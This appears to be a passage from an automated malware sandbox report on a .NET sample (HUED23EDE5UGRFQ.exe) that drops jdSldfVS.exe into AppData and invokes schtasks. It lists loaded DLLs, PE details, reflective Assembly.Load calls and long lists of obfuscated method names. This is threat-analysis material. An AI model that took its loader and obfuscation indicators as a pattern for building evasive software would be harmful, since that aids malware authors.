Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

Source: HUED23EDE5UGRFQ.exe, OptionsWindow.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: jdSldfVS.exe.0.dr, OptionsWindow.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.cs | .Net Code: q9teSJ6F7G System.Reflection.Assembly.Load(byte[])
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.cs | .Net Code: q9teSJ6F7G System.Reflection.Assembly.Load(byte[])
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.cs | .Net Code: q9teSJ6F7G System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 10_2_01592540 push 55030BC3h; ret 10_2_0159254D
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 10_2_07AB5F29 push es; ret 10_2_07AB5F2A
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 10_2_07AB3730 push A407A9C5h; ret 10_2_07AB3735
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 10_2_07AB5EF9 push es; ret 10_2_07AB5EFA
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 10_2_07AB5E63 push es; ret 10_2_07AB5E6A
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 10_2_07AB5E60 push es; ret 10_2_07AB5E62
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 10_2_07AB6999 push cs; ret 10_2_07AB699A
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00457106 push ecx; ret 17_2_00457119
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0045B11A push esp; ret 17_2_0045B141
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0045E54D push esi; ret 17_2_0045E556
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00457A28 push eax; ret 17_2_00457A46
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00434E56 push ecx; ret 17_2_00434E69
Source: HUED23EDE5UGRFQ.exe | Static PE information: section name: .text entropy: 7.9794014993218445
Source: jdSldfVS.exe.0.dr | Static PE information: section name: .text entropy: 7.9794014993218445
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, VrKmqeMx6E5LwgMLC4.cs | High entropy of concatenated method names: 'Hk4PbZ6o4W', 'VnOPQM2EvY', 'dQ3PAdMbr5', 'RrjPkQgbk9', 'GdUPvUwXie', 'Iu5A9QMDGZ', 'swAA3J5jSD', 'OGQAMjonbp', 'IlVAubPjAv', 'uaTAgVOgfP'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, IAZmwL4UXY1NmAmY0w.cs | High entropy of concatenated method names: 'x4dwfjD7lx', 'bXNwTXmSlW', 'x6ZwRUCnTU', 'nDKwGUZ9cB', 'ooGws6yYUT', 'Jg3woJxfib', 'tv3wYmOAms', 'sDAwiXeBJ8', 'AGbw4tPchd', 'uBYw7cABxV'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, EdXujie0QO3KCWsV9Qe.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EWw7myx8Xg', 'tgM7nSnlDS', 'WYx7NdtG5s', 'QWL7aFNuWN', 'aLJ79vHwDM', 'Jim730CBsR', 'oHm7MWbIT6'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, hlyFOV3NjigwVy9fWY.cs | High entropy of concatenated method names: 'qDsKRXhbuX', 'fyJKGAkTmK', 'Nm5Kq5QiVA', 'sehKUAXuPH', 'MWOK0HHkTE', 'lxkKElCtxW', 'qcVKWrPrIx', 'zWDKxmvBnu', 'UbiK1N4cM5', 'wBjKpj5Qcw'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, IhhE4IzvotpcF7E1nA.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gxD4K2YmEV', 'rtj4s9kOKg', 'bcr4oIWZjq', 'TNr4YvISuw', 'jGW4iHoZYy', 'rmj44epd0y', 'i3A47A7BEN'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, omVVIsy4JEq4JnFNAX.cs | High entropy of concatenated method names: 'EgDSs6MYC', 'jYxfUQvu8', 'yUCTwEpHm', 'bOu5YFQOJ', 'w4PGF4JH8', 'ANyXrZKI8', 'klr8eTiECNQnABjAq9', 'gJgGq5P51BjqKhEsa3', 'nhji4jqOJ', 'gjb7kQr5c'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, LSEQgSWw6PFKkwBvUW.cs | High entropy of concatenated method names: 'Q2m4IAvWFa', 'TSd4yo1BkD', 'chP4e03fj1', 'Joh4Jx8hrE', 'Udn4Q1UQbF', 'Ohb4AbKENj', 'lZd4Pwy1Ah', 'D4LiMCDf3c', 'Fediuk7eN7', 'Mycigmo5s5'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, C5Fi006NlErAQ6vXTa.cs | High entropy of concatenated method names: 'rM5YBeiIku', 'dT1YrB7yhh', 'ToString', 'Ao3YJ0DXSw', 'E3XYQYK3cL', 'gWnYwMF2Vj', 'HFKYAbWJkm', 'w5bYPoqBjv', 'gQQYkPE11J', 'RHdYvwLqhL'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, n026WbD77LwpII4skq.cs | High entropy of concatenated method names: 'lJHAFjLdXH', 'AsMA5B816f', 'vfrwtn6SYn', 'vHuw0lcSKs', 'vnUwEc939r', 'UB3wCmGo0e', 'lRXwWRdJ55', 'G12wxZTVE2', 'XLqwdOpbpe', 'BiAw16wqCc'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, QUsUCJZYbbjkgd53fi.cs | High entropy of concatenated method names: 'Jt1Ik8ZB02', 'shyIvcio2y', 'vlbIBjhP3D', 'N11Irfslj0', 'gGjIsOHOSk', 'uwiIoisVXe', 'WsVbIsEdoSd1VYCdns', 'VdMVqG0teZ9AKdHlWT', 'dbyIIL1OnQ', 'mv8IyFivtb'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, KevtKNusq8g1AfXZ5c.cs | High entropy of concatenated method names: 'BaskcxbOHJ', 'LYukZdPo3O', 'HX9kSewxDQ', 'NvykfmtBjl', 'M5ikFbNDVL', 'UsokTm9dBM', 'DGKk5ldC6t', 'SDwkRX5ySJ', 'V9vkGpn5Zb', 'WvkkXS8vqt'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.cs | High entropy of concatenated method names: 'pt5yb7OWcw', 'XFRyJUg1wV', 'NnHyQgEXDc', 'oyQywJoPli', 't8YyA8yUdn', 'N7QyP3H2AE', 'sjiykyXWgr', 'rGsyvLuMG5', 'v95y6xTj0e', 'oWXyBiLwIp'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, O7QaxOP1WHfuKiysCB.cs | High entropy of concatenated method names: 'iF1iqN2Ix7', 'qyJiUJAgbi', 'atRitsUWSG', 'UoEi0ZTDMw', 'dquimOLOel', 'cZ3iEOe2tr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, UsNrrbl72Ir1JF4Inh.cs | High entropy of concatenated method names: 'RR5iJQSZlT', 'aM7iQBhrAS', 'EZKiwuLK8J', 'hDPiAhGv1Q', 'GGJiPL0pxD', 'vegikF3Qys', 'Qrwivv9eID', 'pOEi6NrRx0', 'xqfiBhaXAK', 'eR8irPgAc5'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ULLvmxT725yvDGgCf2.cs | High entropy of concatenated method names: 'Kufs1jK0Hw', 'DIrshoW4RW', 'zFvsmLWmUu', 'lwisncaH5M', 'bBEsUdMnPP', 'w0kstIFyvh', 'I1ls0VZ5DC', 'tNWsEiwVEj', 'MkwsCcVV2Q', 'caEsWea0Dc'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, DSSwTQO1NWXixqGlCL.cs | High entropy of concatenated method names: 'zlBQmA66Lh', 'EEQQnjJRDT', 'A1eQNBJOhJ', 'P55Qaden2w', 't1bQ96PaJw', 'HNyQ3WKvm1', 'yClQMfqAY5', 'AODQuFaXhT', 'j5aQg4rj8o', 'alRQDH46qh'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, oT9uaNmRpGhyBXALGV.cs | High entropy of concatenated method names: 'O8VkJWd4Cf', 'bbLkwssU52', 'quRkPAjuXO', 'KmOPD0dkpB', 's50PzKtHQL', 'xX2kOGa260', 'TAdkI3bhaB', 'TBdk2twsMf', 'Acwky4QwXT', 'ueckeQIEnl'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, x2AqPHq2qhLej4XYqg.cs | High entropy of concatenated method names: 'QoIPN1ljCY', 'B0WPaOkxZO', 'A3tP9aiSEI', 'ToString', 'HsiP3vy0jA', 'e2sPMT2cGD', 'VmfrR0l3MWhDe4bkGsg', 'UBP4OtlNENICldRnPou', 'VU6ZITlrYnYsgKZkO7Q', 'OFxHAyly07COCRvgANx'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, flsNFv1jqRn4UFfbYv.cs | High entropy of concatenated method names: 'AK1Yuw30dv', 'DMNYDKofPr', 't1tiO2Iai7', 'gi5iIVjKpB', 'Xp4YpUP5CX', 'M75Yhl2fHN', 'EG4Y81lKAP', 'qmWYmw7roK', 'lAHYnUmdON', 'EwkYNZeps6'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, qVbjiYeg51FIPLgDide.cs | High entropy of concatenated method names: 'zwH4cUCJDl', 'vdX4ZNxuaD', 'LOa4Sx6V7l', 'uFB4fUUoZO', 'Oft4FIqtry', 'Qce4TCe74A', 'wl345clhix', 't2K4Red2VO', 'Y4M4GK1488', 'HmA4Xk0S9m'
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, yxkao7hiFSsCxJrj6x.cs | High entropy of concatenated method names: 'Dispose', 'scYIg4SsGH', 'NsG2UcEpqL', 'aYvjjmHQdT', 'xXHIDRqdFg', 'sCgIzqmx7K', 'ProcessDialogKey', 'FDb2ONo6rM', 'XZY2IVTUPT', 'fVb22oh36r'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, VrKmqeMx6E5LwgMLC4.cs | High entropy of concatenated method names: 'Hk4PbZ6o4W', 'VnOPQM2EvY', 'dQ3PAdMbr5', 'RrjPkQgbk9', 'GdUPvUwXie', 'Iu5A9QMDGZ', 'swAA3J5jSD', 'OGQAMjonbp', 'IlVAubPjAv', 'uaTAgVOgfP'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, IAZmwL4UXY1NmAmY0w.cs | High entropy of concatenated method names: 'x4dwfjD7lx', 'bXNwTXmSlW', 'x6ZwRUCnTU', 'nDKwGUZ9cB', 'ooGws6yYUT', 'Jg3woJxfib', 'tv3wYmOAms', 'sDAwiXeBJ8', 'AGbw4tPchd', 'uBYw7cABxV'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, EdXujie0QO3KCWsV9Qe.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EWw7myx8Xg', 'tgM7nSnlDS', 'WYx7NdtG5s', 'QWL7aFNuWN', 'aLJ79vHwDM', 'Jim730CBsR', 'oHm7MWbIT6'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, hlyFOV3NjigwVy9fWY.cs | High entropy of concatenated method names: 'qDsKRXhbuX', 'fyJKGAkTmK', 'Nm5Kq5QiVA', 'sehKUAXuPH', 'MWOK0HHkTE', 'lxkKElCtxW', 'qcVKWrPrIx', 'zWDKxmvBnu', 'UbiK1N4cM5', 'wBjKpj5Qcw'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, IhhE4IzvotpcF7E1nA.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gxD4K2YmEV', 'rtj4s9kOKg', 'bcr4oIWZjq', 'TNr4YvISuw', 'jGW4iHoZYy', 'rmj44epd0y', 'i3A47A7BEN'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, omVVIsy4JEq4JnFNAX.cs | High entropy of concatenated method names: 'EgDSs6MYC', 'jYxfUQvu8', 'yUCTwEpHm', 'bOu5YFQOJ', 'w4PGF4JH8', 'ANyXrZKI8', 'klr8eTiECNQnABjAq9', 'gJgGq5P51BjqKhEsa3', 'nhji4jqOJ', 'gjb7kQr5c'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, LSEQgSWw6PFKkwBvUW.cs | High entropy of concatenated method names: 'Q2m4IAvWFa', 'TSd4yo1BkD', 'chP4e03fj1', 'Joh4Jx8hrE', 'Udn4Q1UQbF', 'Ohb4AbKENj', 'lZd4Pwy1Ah', 'D4LiMCDf3c', 'Fediuk7eN7', 'Mycigmo5s5'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, C5Fi006NlErAQ6vXTa.cs | High entropy of concatenated method names: 'rM5YBeiIku', 'dT1YrB7yhh', 'ToString', 'Ao3YJ0DXSw', 'E3XYQYK3cL', 'gWnYwMF2Vj', 'HFKYAbWJkm', 'w5bYPoqBjv', 'gQQYkPE11J', 'RHdYvwLqhL'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, n026WbD77LwpII4skq.cs | High entropy of concatenated method names: 'lJHAFjLdXH', 'AsMA5B816f', 'vfrwtn6SYn', 'vHuw0lcSKs', 'vnUwEc939r', 'UB3wCmGo0e', 'lRXwWRdJ55', 'G12wxZTVE2', 'XLqwdOpbpe', 'BiAw16wqCc'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, QUsUCJZYbbjkgd53fi.cs | High entropy of concatenated method names: 'Jt1Ik8ZB02', 'shyIvcio2y', 'vlbIBjhP3D', 'N11Irfslj0', 'gGjIsOHOSk', 'uwiIoisVXe', 'WsVbIsEdoSd1VYCdns', 'VdMVqG0teZ9AKdHlWT', 'dbyIIL1OnQ', 'mv8IyFivtb'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, KevtKNusq8g1AfXZ5c.cs | High entropy of concatenated method names: 'BaskcxbOHJ', 'LYukZdPo3O', 'HX9kSewxDQ', 'NvykfmtBjl', 'M5ikFbNDVL', 'UsokTm9dBM', 'DGKk5ldC6t', 'SDwkRX5ySJ', 'V9vkGpn5Zb', 'WvkkXS8vqt'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.cs | High entropy of concatenated method names: 'pt5yb7OWcw', 'XFRyJUg1wV', 'NnHyQgEXDc', 'oyQywJoPli', 't8YyA8yUdn', 'N7QyP3H2AE', 'sjiykyXWgr', 'rGsyvLuMG5', 'v95y6xTj0e', 'oWXyBiLwIp'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, O7QaxOP1WHfuKiysCB.cs | High entropy of concatenated method names: 'iF1iqN2Ix7', 'qyJiUJAgbi', 'atRitsUWSG', 'UoEi0ZTDMw', 'dquimOLOel', 'cZ3iEOe2tr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, UsNrrbl72Ir1JF4Inh.cs | High entropy of concatenated method names: 'RR5iJQSZlT', 'aM7iQBhrAS', 'EZKiwuLK8J', 'hDPiAhGv1Q', 'GGJiPL0pxD', 'vegikF3Qys', 'Qrwivv9eID', 'pOEi6NrRx0', 'xqfiBhaXAK', 'eR8irPgAc5'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ULLvmxT725yvDGgCf2.cs | High entropy of concatenated method names: 'Kufs1jK0Hw', 'DIrshoW4RW', 'zFvsmLWmUu', 'lwisncaH5M', 'bBEsUdMnPP', 'w0kstIFyvh', 'I1ls0VZ5DC', 'tNWsEiwVEj', 'MkwsCcVV2Q', 'caEsWea0Dc'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, DSSwTQO1NWXixqGlCL.cs | High entropy of concatenated method names: 'zlBQmA66Lh', 'EEQQnjJRDT', 'A1eQNBJOhJ', 'P55Qaden2w', 't1bQ96PaJw', 'HNyQ3WKvm1', 'yClQMfqAY5', 'AODQuFaXhT', 'j5aQg4rj8o', 'alRQDH46qh'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, oT9uaNmRpGhyBXALGV.cs | High entropy of concatenated method names: 'O8VkJWd4Cf', 'bbLkwssU52', 'quRkPAjuXO', 'KmOPD0dkpB', 's50PzKtHQL', 'xX2kOGa260', 'TAdkI3bhaB', 'TBdk2twsMf', 'Acwky4QwXT', 'ueckeQIEnl'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, x2AqPHq2qhLej4XYqg.cs | High entropy of concatenated method names: 'QoIPN1ljCY', 'B0WPaOkxZO', 'A3tP9aiSEI', 'ToString', 'HsiP3vy0jA', 'e2sPMT2cGD', 'VmfrR0l3MWhDe4bkGsg', 'UBP4OtlNENICldRnPou', 'VU6ZITlrYnYsgKZkO7Q', 'OFxHAyly07COCRvgANx'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, flsNFv1jqRn4UFfbYv.cs | High entropy of concatenated method names: 'AK1Yuw30dv', 'DMNYDKofPr', 't1tiO2Iai7', 'gi5iIVjKpB', 'Xp4YpUP5CX', 'M75Yhl2fHN', 'EG4Y81lKAP', 'qmWYmw7roK', 'lAHYnUmdON', 'EwkYNZeps6'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, qVbjiYeg51FIPLgDide.cs | High entropy of concatenated method names: 'zwH4cUCJDl', 'vdX4ZNxuaD', 'LOa4Sx6V7l', 'uFB4fUUoZO', 'Oft4FIqtry', 'Qce4TCe74A', 'wl345clhix', 't2K4Red2VO', 'Y4M4GK1488', 'HmA4Xk0S9m'
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, yxkao7hiFSsCxJrj6x.cs | High entropy of concatenated method names: 'Dispose', 'scYIg4SsGH', 'NsG2UcEpqL', 'aYvjjmHQdT', 'xXHIDRqdFg', 'sCgIzqmx7K', 'ProcessDialogKey', 'FDb2ONo6rM', 'XZY2IVTUPT', 'fVb22oh36r'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, VrKmqeMx6E5LwgMLC4.cs | High entropy of concatenated method names: 'Hk4PbZ6o4W', 'VnOPQM2EvY', 'dQ3PAdMbr5', 'RrjPkQgbk9', 'GdUPvUwXie', 'Iu5A9QMDGZ', 'swAA3J5jSD', 'OGQAMjonbp', 'IlVAubPjAv', 'uaTAgVOgfP'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, IAZmwL4UXY1NmAmY0w.cs | High entropy of concatenated method names: 'x4dwfjD7lx', 'bXNwTXmSlW', 'x6ZwRUCnTU', 'nDKwGUZ9cB', 'ooGws6yYUT', 'Jg3woJxfib', 'tv3wYmOAms', 'sDAwiXeBJ8', 'AGbw4tPchd', 'uBYw7cABxV'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, EdXujie0QO3KCWsV9Qe.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EWw7myx8Xg', 'tgM7nSnlDS', 'WYx7NdtG5s', 'QWL7aFNuWN', 'aLJ79vHwDM', 'Jim730CBsR', 'oHm7MWbIT6'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, hlyFOV3NjigwVy9fWY.cs | High entropy of concatenated method names: 'qDsKRXhbuX', 'fyJKGAkTmK', 'Nm5Kq5QiVA', 'sehKUAXuPH', 'MWOK0HHkTE', 'lxkKElCtxW', 'qcVKWrPrIx', 'zWDKxmvBnu', 'UbiK1N4cM5', 'wBjKpj5Qcw'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, IhhE4IzvotpcF7E1nA.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gxD4K2YmEV', 'rtj4s9kOKg', 'bcr4oIWZjq', 'TNr4YvISuw', 'jGW4iHoZYy', 'rmj44epd0y', 'i3A47A7BEN'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, omVVIsy4JEq4JnFNAX.cs | High entropy of concatenated method names: 'EgDSs6MYC', 'jYxfUQvu8', 'yUCTwEpHm', 'bOu5YFQOJ', 'w4PGF4JH8', 'ANyXrZKI8', 'klr8eTiECNQnABjAq9', 'gJgGq5P51BjqKhEsa3', 'nhji4jqOJ', 'gjb7kQr5c'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, LSEQgSWw6PFKkwBvUW.cs | High entropy of concatenated method names: 'Q2m4IAvWFa', 'TSd4yo1BkD', 'chP4e03fj1', 'Joh4Jx8hrE', 'Udn4Q1UQbF', 'Ohb4AbKENj', 'lZd4Pwy1Ah', 'D4LiMCDf3c', 'Fediuk7eN7', 'Mycigmo5s5'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, C5Fi006NlErAQ6vXTa.cs | High entropy of concatenated method names: 'rM5YBeiIku', 'dT1YrB7yhh', 'ToString', 'Ao3YJ0DXSw', 'E3XYQYK3cL', 'gWnYwMF2Vj', 'HFKYAbWJkm', 'w5bYPoqBjv', 'gQQYkPE11J', 'RHdYvwLqhL'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, n026WbD77LwpII4skq.cs | High entropy of concatenated method names: 'lJHAFjLdXH', 'AsMA5B816f', 'vfrwtn6SYn', 'vHuw0lcSKs', 'vnUwEc939r', 'UB3wCmGo0e', 'lRXwWRdJ55', 'G12wxZTVE2', 'XLqwdOpbpe', 'BiAw16wqCc'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, QUsUCJZYbbjkgd53fi.cs | High entropy of concatenated method names: 'Jt1Ik8ZB02', 'shyIvcio2y', 'vlbIBjhP3D', 'N11Irfslj0', 'gGjIsOHOSk', 'uwiIoisVXe', 'WsVbIsEdoSd1VYCdns', 'VdMVqG0teZ9AKdHlWT', 'dbyIIL1OnQ', 'mv8IyFivtb'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, KevtKNusq8g1AfXZ5c.cs | High entropy of concatenated method names: 'BaskcxbOHJ', 'LYukZdPo3O', 'HX9kSewxDQ', 'NvykfmtBjl', 'M5ikFbNDVL', 'UsokTm9dBM', 'DGKk5ldC6t', 'SDwkRX5ySJ', 'V9vkGpn5Zb', 'WvkkXS8vqt'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.cs | High entropy of concatenated method names: 'pt5yb7OWcw', 'XFRyJUg1wV', 'NnHyQgEXDc', 'oyQywJoPli', 't8YyA8yUdn', 'N7QyP3H2AE', 'sjiykyXWgr', 'rGsyvLuMG5', 'v95y6xTj0e', 'oWXyBiLwIp'
